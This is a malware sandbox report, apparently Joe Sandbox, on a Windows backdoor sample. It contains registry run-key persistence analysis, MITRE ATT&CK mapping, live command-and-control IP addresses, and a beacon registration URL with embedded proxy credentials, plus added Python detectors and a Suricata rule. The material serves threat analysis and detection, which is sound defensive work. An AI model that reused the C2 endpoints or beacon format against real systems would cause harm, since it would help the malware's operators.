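def normalize_reg_path(path: str) -> str:
    """Collapse the doubled backslashes the sample uses and expand the hive alias."""
    while "\\\\" in path:
        path = path.replace("\\\\", "\\")
    hive, _, rest = path.partition("\\")
    return HIVES.get(hive.upper(), hive) + "\\" + rest


def analyze_run_key_persistence(line: str):
    """Return the autorun IOC and triage flags for a Process-created line, or None."""
    cmd = _CMD.search(line)
    if not cmd:
        return None
    body = cmd.group("body")
    setp = _SET.search(body)
    if not setp:
        return None
    key = normalize_reg_path(setp.group("path"))
    name, value = setp.group("name"), setp.group("value")

    # Test-Path on the Registry provider answers "does this KEY exist"; values are
    # item properties and never satisfy it. A guard on "<key>\<name>" is therefore
    # false on every run (unless a subkey named <name> exists), so the value is
    # rewritten each time the sample starts instead of being set once.
    guard = _GUARD.search(body)
    guard_target = normalize_reg_path(guard.group("target")) if guard else None
    guard_is_ineffective = (
        guard_target is not None and guard_target.lower() == f"{key}\\{name}".lower()
    )

    target = value.lower()
    return {
        "key": key,
        "name": name,
        "value": value,
        "hidden_window": re.search(r"-WindowStyle\s+hidden", line, re.I) is not None,
        "user_writable_target": target.startswith("c:\\users\\")
        or any(d in target for d in USER_WRITABLE),
        "guard_is_ineffective": guard_is_ineffective,
    }


if __name__ == "__main__":
    for variant in (REPORT_LINE, REPORT_LINE.lower()):  # the report logs both casings
        for k, v in analyze_run_key_persistence(variant).items():
            print(f"{k:>22}: {v}")
        print()
```

The lower-cased variant is handled because Joe Sandbox emits both casings of the same command line (compare the third to sixth Process created entries with the first two); a hunt that keys on the exact string would otherwise miss half of them.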

Stealing of Sensitive Information

Source: Yara match; File source: Process Memory Space: lDO4WBEQyL.exe PID: 7328, type: MEMORYSTR

Remote Access Functionality

Source: Yara match; File source: Process Memory Space: lDO4WBEQyL.exe PID: 7328, type: MEMORYSTR
MITRE ATT&CK matrix, transposed to one line per tactic. A leading number is the count of matched signatures the report attaches to that technique; techniques without a number are the matrix placeholders the report shows without a match.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 1 Command and Scripting Interpreter; 1 PowerShell; At; Cron; Launchd; Scheduled Task
Persistence: 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 11 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 1 Masquerading; 21 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Obfuscated Files or Information; 1 DLL Side-Loading; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 System Time Discovery; 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 12 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 1 Non-Standard Port; 2 Non-Application Layer Protocol; 2 Application Layer Protocol; 1 Proxy; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
Behavior Graph ID: 1583035 | Sample: lDO4WBEQyL.exe | Start date: 01/01/2025 | Architecture: WINDOWS | Score: 88

Start (node 2)
  DNS: 198.187.3.20.in-addr.arpa
  Signatures: Suricata IDS alerts for network traffic; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 3 other signatures
  Started: lDO4WBEQyL.exe (node 8, counter 1); lDO4WBEQyL.exe (node 12); lDO4WBEQyL.exe (node 14)
lDO4WBEQyL.exe (node 8)
  Network: 185.157.213.253, ports 22132, 59227 (TVHORADADAES, Spain); 46.8.232.106, ports 59226, 59228, 59229 (FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics, Russian Federation)
  Signatures: Suspicious powershell command line found; Found Tor onion address
  Started: powershell.exe (node 16, counters 1, 11)
lDO4WBEQyL.exe (node 12)
  Started: powershell.exe (node 18)
powershell.exe (node 16)
  Started: conhost.exe (node 20)
powershell.exe (node 18)
  Started: conhost.exe (node 22)
(The small numbers beside a process node are the created-file and created-registry-value counters described in the legend; which number is which cannot be recovered from the flattened graph.)

Source | Detection | Scanner | Label
lDO4WBEQyL.exe | 24% | Virustotal |
lDO4WBEQyL.exe | 37% | ReversingLabs | Win32.Ransomware.GOBackdoor
lDO4WBEQyL.exe | 100% | Avira | HEUR/AGEN.1316942
lDO4WBEQyL.exe | 100% | Joe Sandbox ML |
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
Source | Detection | Scanner | Label
http://147.45.196.157http://46.8.232.106 | 0% | Avira URL Cloud | safe
http://147.45.196.157185.157.213.253;22132;hdPotrYMtNLspDL2:4JI/ggA/xcm4fqR6ijq.9ju8LHC.jmQ2AXr36Hj2 | 0% | Avira URL Cloud | safe
http://147.45.196.157 | 0% | Avira URL Cloud | safe
http://crl.microL | 0% | Avira URL Cloud | safe
http://91.212.166.9 | 0% | Avira URL Cloud | safe
http://38.180.205.164 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
198.187.3.20.in-addr.arpa | unknown | unknown | false | | high
Note: this is the only name the sample resolved. It is the reverse-lookup name for 20.3.187.198, an address the analysis whitelists (it appears in the excluded IPs list in the analysis settings below), so the "Tries to resolve domain names, but no domain seems valid" signature is driven by this PTR query, not by a malware domain; the sample's real infrastructure is addressed by raw IP.
Name | Malicious | Antivirus Detection | Reputation
http://46.8.232.106/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://147.45.196.157 | lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.2945903417.0000000005A32000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000008.00000002.3899974175.00000000059C3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://147.45.196.157185.157.213.253;22132;hdPotrYMtNLspDL2:4JI/ggA/xcm4fqR6ijq.9ju8LHC.jmQ2AXr36Hj2 | lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC40000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://147.45.196.157http://46.8.232.106 | lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC40000.00000004.00001000.00020000.00000000.sdmp; lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.212.166.9 | lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.microL | powershell.exe, 00000008.00000002.3891780842.0000000002AD8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000008.00000002.3893167157.0000000004AB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore6lB | powershell.exe, 00000004.00000002.2943211667.00000000049D1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000008.00000002.3893167157.0000000004961000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000008.00000002.3893167157.0000000004AB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://46.8.232.106 | lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000008.00000002.3899974175.00000000059C3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.2945903417.0000000005A32000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000008.00000002.3899974175.00000000059C3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000008.00000002.3899974175.00000000059C3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://38.180.205.164 | lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000008.00000002.3899974175.00000000059C3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://46.8.236.61 | lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.2943211667.00000000049D1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000008.00000002.3893167157.0000000004961000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000008.00000002.3893167157.0000000004AB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://91.212.166.91 | lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmp | false | | high
Reading this table: the nuget.org, contoso.com, pesterbdd.com, apache.org, aka.ms and schemas.xmlsoap.org strings come from powershell.exe memory and are stock .NET / PowerShell module artifacts, not sample activity; http://crl.microL is a truncated string and is left as the report shows it. The strings that begin with http://147.45.196.157 and run straight into another URL or into 185.157.213.253;22132;... appear to be adjacent strings in the sample's memory that the URL extractor merged; the 185.157.213.253;22132 fragment matches the endpoint the sample actually connected to (port 22132 on 185.157.213.253, the one IP the report marks malicious), and 46.8.232.106 is the second contacted host. The bare-IP URLs from the sample's memory (147.45.196.157, 91.212.166.9, 91.212.166.91, 38.180.205.164, 46.8.236.61) are worth carrying as pivot candidates; an Avira URL Cloud "safe" verdict on a bare IP carries little weight either way.
IP | Domain | Country | ASN | ASN Name | Malicious
46.8.232.106 | unknown | Russian Federation | 28917 | FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | false
185.157.213.253 | unknown | Spain | 50129 | TVHORADADAES | true
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1583035
                                  Start date and time:2025-01-01 17:00:20 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 7m 17s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Run name:Run with higher sleep bypass
                                  Number of analysed new started processes analysed:10
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:lDO4WBEQyL.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:43142552e4812e3337226ca1664ed728.exe
                                  Detection:MAL
                                  Classification:mal88.troj.evad.winEXE@9/6@1/2
                                  EGA Information:
                                  • Successful, ratio: 75%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45, 23.1.237.91, 20.3.187.198, 52.149.20.212
                                  • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target powershell.exe, PID 7940 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
Time | Type | Description
17:02:34 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run App C:\Users\user\Desktop\lDO4WBEQyL.exe
17:02:42 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run App C:\Users\user\Desktop\lDO4WBEQyL.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
46.8.232.106 | Set-up.exe | malicious | LummaC, GO Backdoor, LummaC Stealer | 46.8.232.106:30001/api/helper-first-register?buildVersion=0dfF.ore2kBf&md5=a64beab5d4516beca4c40b25dc0c1cd8&proxyPassword=dUZKyymJ&proxyUsername=cACUQSOf&userId=GwhkeMIXedr6k95cAje2l7kZetpIxXXDa1K3
46.8.232.106 | reduce.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | InsertSr.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | iKhdG3bwZK.exe | malicious | GO Backdoor | 46.8.232.106:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou
46.8.232.106 | Week11.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | Week11.exe.bin.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | m0Yc9KltGw.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | SecuriteInfo.com.FileRepMalware.7838.24766.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | BwqqVoHR71.exe | malicious | GO Backdoor | 46.8.232.106/
185.157.213.253 | Week11.exe.bin.exe | malicious | GO Backdoor |
                                    No context
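The context table above records the registration request that related GO Backdoor samples send to 46.8.232.106:30001: a GET-style query to /api/helper-first-register carrying buildVersion, md5, proxyPassword, proxyUsername and userId. The detector below is an added example, not a Joe Sandbox or Suricata rule taken from this report. It classifies proxy-log URLs against that shape, distinguishes a full match from a partial one, and emits a Suricata rule for the same URI pattern. The log format and every line except the first URL are constructed; the rule's sid and msg text are the author's choice.

```python
"""Flag GO Backdoor style registration beacons in web-proxy logs.

Added example for this report page; not a Joe Sandbox or Suricata rule from the
report. The URI shape comes from the report's context table; the log format, the
hosts other than 46.8.232.106 and the rule's sid/msg are the author's choice.
"""
import re
from urllib.parse import parse_qs, urlsplit

BEACON_PATH = "/api/helper-first-register"
BEACON_PARAMS = {"buildVersion", "md5", "proxyPassword", "proxyUsername", "userId"}
HEX32 = re.compile(r"^[0-9a-f]{32}$", re.I)

# Constructed log: "<timestamp> <client> <server:port> <url>" per line. The first URL is
# the registration request the report lists for 46.8.232.106:30001; the rest are made up.
SAMPLE_LOG = """\
2025-01-01T16:02:41Z 10.0.0.15 46.8.232.106:30001 http://46.8.232.106:30001/api/helper-first-register?buildVersion=0dfF.ore2kBf&md5=a64beab5d4516beca4c40b25dc0c1cd8&proxyPassword=dUZKyymJ&proxyUsername=cACUQSOf&userId=GwhkeMIXedr6k95cAje2l7kZetpIxXXDa1K3
2025-01-01T16:02:45Z 10.0.0.15 13.107.246.45:443 https://www.bing.com/
2025-01-01T16:03:10Z 10.0.0.22 203.0.113.7:8080 http://203.0.113.7:8080/api/helper-first-register?buildVersion=x&md5=notahash&userId=abc
2025-01-01T16:03:12Z 10.0.0.22 203.0.113.7:8080 http://203.0.113.7:8080/api/helper-first-register?buildVersion=1.2&md5=0123456789abcdef0123456789abcdef&proxyPassword=p&proxyUsername=u&userId=zz
"""


def classify_url(url: str):
    """Return a finding dict if the URL has the registration shape, else None."""
    parts = urlsplit(url)
    if parts.path != BEACON_PATH:
        return None
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    missing = BEACON_PARAMS - query.keys()
    return {
        "host": parts.hostname,
        "port": parts.port,
        # Full parameter set -> high; path alone -> medium (variant or partial log).
        "confidence": "high" if not missing else "medium",
        "missing_params": sorted(missing),
        # The md5 field in the report is a 32-hex digest; anything else is a variant.
        "md5_is_hash": bool(HEX32.match(query.get("md5", ""))),
        "build_version": query.get("buildVersion"),
        "user_id": query.get("userId"),
    }


def find_beacons(log_text: str):
    """Scan whitespace-separated log lines and return one finding per matching URL."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        ts, client, _server, url = fields[:4]
        finding = classify_url(url)
        if finding:
            finding.update(ts=ts, client=client)
            findings.append(finding)
    return findings


def suricata_rule(sid: int = 1000001) -> str:
    """Suricata (5+) rule for the same URI shape; sid and msg are the author's choice."""
    return (
        "alert http any any -> any any ("
        'msg:"GO Backdoor helper-first-register beacon"; flow:established,to_server; '
        f'http.uri; content:"{BEACON_PATH}"; startswith; '
        'content:"proxyUsername="; content:"proxyPassword="; '
        f"classtype:trojan-activity; sid:{sid}; rev:1;)"
    )


if __name__ == "__main__":
    for f in find_beacons(SAMPLE_LOG):
        print(f"{f['ts']} {f['client']} -> {f['host']}:{f['port']} "
              f"{f['confidence']} md5_is_hash={f['md5_is_hash']} missing={f['missing_params']}")
    print(suricata_rule())
```

The path match is deliberately exact and the parameter check separate, so a builder that drops the proxy credentials (the medium-confidence case) is still surfaced for review rather than silently missed; the Suricata rule keys on the path plus the two proxy parameters because those are the least likely to appear in benign traffic.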
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | Set-up.exe | malicious | LummaC, GO Backdoor, LummaC Stealer | 46.8.232.106
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | r4xiHKy8aM.exe | malicious | Socks5Systemz | 46.8.225.74
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | newwork.exe.1.exe | malicious | Socks5Systemz | 46.8.225.74
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | steel.exe.3.exe | malicious | Socks5Systemz | 46.8.225.74
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | AbC0LBkVhr.exe | malicious | Socks5Systemz | 46.8.225.74
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | KRdh0OaXqH.exe | malicious | Petite Virus, Socks5Systemz | 46.8.225.74
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | AGcC2uK0El.exe | malicious | Petite Virus, Socks5Systemz | 46.8.225.74
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | 6hvZpn91O8.exe | malicious | Petite Virus, Socks5Systemz | 46.8.225.74
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | j9htknb7BQ.exe | malicious | Petite Virus, Socks5Systemz | 46.8.225.74
TVHORADADAES | nshsh4.elf | malicious | Mirai | 156.67.60.38
TVHORADADAES | https://agradeahead.com/ | malicious | Unknown | 185.76.79.50
TVHORADADAES | http://productfocus.com | malicious | Unknown | 185.76.79.50
TVHORADADAES | mips.elf | malicious | Mirai | 156.67.60.34
TVHORADADAES | ppc.elf | malicious | Mirai | 156.67.60.61
TVHORADADAES | https://getvideoz.click/ | malicious | Unknown | 185.215.4.66
TVHORADADAES | mips.elf | malicious | Mirai | 156.67.60.30
TVHORADADAES | arm5-20241201-0124.elf | malicious | Mirai | 156.67.60.62
TVHORADADAES | arm7-20241201-0124.elf | malicious | Mirai | 156.67.60.59
TVHORADADAES | arm.elf | malicious | Mirai | 156.67.60.45
                                    No context
                                    No context
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1264
                                    Entropy (8bit):5.378029932483578
                                    Encrypted:false
                                    SSDEEP:24:3FBWSKco4KmBs4RPT6BmFoUebIlmjKcmZ9tXt/NK3R8O9r/:vWSU4y4RQmFoUeUmfmZ9tlNWR8GT
                                    MD5:FDB2DD82A4439553B0BBFA0DD734A477
                                    SHA1:D8AAC3E2FAE870797DE627DE472E4E9DC8A70FEA
                                    SHA-256:A0A12EA527A987BF2E3E42261FE874F18738ED5341AAE05F287D383582A7F3DE
                                    SHA-512:C7B17B37EF60E14CA05954E7134B5CCD568E3EB7A3B8EEEE93F72F6C07D55B22A12D233877A210215A3C8AB7FCCB515CE07EA7E8DFE581C387F78FA3EFF365B5
                                    Malicious:false
                                    Reputation:low
                                    Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Users\user\Desktop\lDO4WBEQyL.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):492
                                    Entropy (8bit):6.276849981375167
                                    Encrypted:false
                                    SSDEEP:12:DMq63V2pfzi7YRJ9tGLFwx0MPYK2LE12qQfOHolsWGNn00u:DZm29zlBtGO0MPdKErolst0N
                                    MD5:2DA71D9BD3A98BB56AD568298509FE3F
                                    SHA1:A0056B51C3A3515704DB81B1636F27C6CCCE3B9B
                                    SHA-256:1322B6E0D2CE18074C60C570353671E941977DF16DFDC377E1A318776144C6BE
                                    SHA-512:5674498BE0A1E5A4895E195C46A3F3539D60341E4B9E5D8187E78164BC0507FA7AE78AF08D7BA534E6EFB1ED9736CA278ECFD064DD1AA24CA2862BD8AFA0D4C9
                                    Malicious:false
                                    Preview:..>...:".(%..+"TSS)&A..&L...]..=X...MV..Q++,@..6Q.6.ZQ+.\.YUM9XRX36W^6=WU)9 E^P.../..#)..S.%..<.Y=._F0..A.>WW^()_Q"=@.06[.W_G."&\.'6P..*_.Z.@.;4U_.5X...B6...'V0..9[.."5.;.4S.2WA.(-L.=.P..\_3!/M..0[.0._)/*Q]..G5S8_33.U.#._Q..@>3.Z.,.XQ.8B?.%.Z++..PZ.?^..5?PS.$.A?:.L])*Z.;(V18+M\<.X.;.V4+!S5_.GV.%\2..S.^.\%'.@...R6.R_*T"Z>.PO.8V..9....&..*7.)..T...L5 "F.PWW...R*;!G...\..TRZ./[.T<@..SR.'?_>..X'=7M8.VP..9B.-...Z3.).&.W....&.S3W8A.!RL[(.X...Z% PT,. G...ZR..VV9!G6:._5.$Z..'_5..@.9SR..P\%.>Y5.?
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.145237909053076
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:lDO4WBEQyL.exe
                                    File size:8'812'032 bytes
                                    MD5:43142552e4812e3337226ca1664ed728
                                    SHA1:8c1806c454beb91cc24fec69ca8e26c560790d6e
                                    SHA256:d08de75b76be3596cbcb6fa6f0c39bd41cd876d29cec1108990856989d6ed0f9
                                    SHA512:fbe6ac73a525a3eb090caa6dbc85cfcc31f0fbede4f9b0a541edfe22546ee90b67a2a8e276d1e3abebff869dbfcf4ebd0c57e5cfd8e8dc4bc1812a953e59e506
                                    SSDEEP:98304:SIxCKqVa0fpYI5ejgE1QEa1RR3Aw5nTlmoisSH4m3NHWtwLi1T2/GF25gFBfsxEm:pxjqVa0fpY7IEazN5nMoisSH4svYF
                                    TLSH:13966C1D8E3B09E58BE71DB8A5969FB87FBCB70C2A70435E47BA08015483F79061771A
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\.i.\.i.\.i..vj.Q.i..vl...i..vm.O.i...l.z.i...m.L.i...j.N.i..vh.Y.i.\.h...i...a.].i.....].i...k.].i.Rich\.i.........PE..L..
                                    Icon Hash:3030323030303428
                                    Entrypoint:0x436540
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x676EB366 [Fri Dec 27 14:02:14 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:6
                                    OS Version Minor:0
                                    File Version Major:6
                                    File Version Minor:0
                                    Subsystem Version Major:6
                                    Subsystem Version Minor:0
                                    Import Hash:4159edb38142459c0d592c68fcfb12bb
                                    Instruction
                                    push ebp
                                    mov ebp, esp
                                    call 00007F3378E27EFDh
                                    pop ebp
                                    ret
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    push ebp
                                    mov ebp, esp
                                    push 00000000h
                                    call dword ptr [00468018h]
                                    mov eax, dword ptr [ebp+08h]
                                    push eax
                                    call dword ptr [00468014h]
                                    push C0000409h
                                    call dword ptr [0046801Ch]
                                    push eax
                                    call dword ptr [00468020h]
                                    pop ebp
                                    ret
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 00000324h
                                    push 00000017h
                                    call dword ptr [00468024h]
                                    test eax, eax
                                    je 00007F3378E281F9h
                                    mov ecx, 00000002h
                                    int 29h
                                    mov dword ptr [00C50470h], eax
                                    mov dword ptr [00C5046Ch], ecx
                                    mov dword ptr [00C50468h], edx
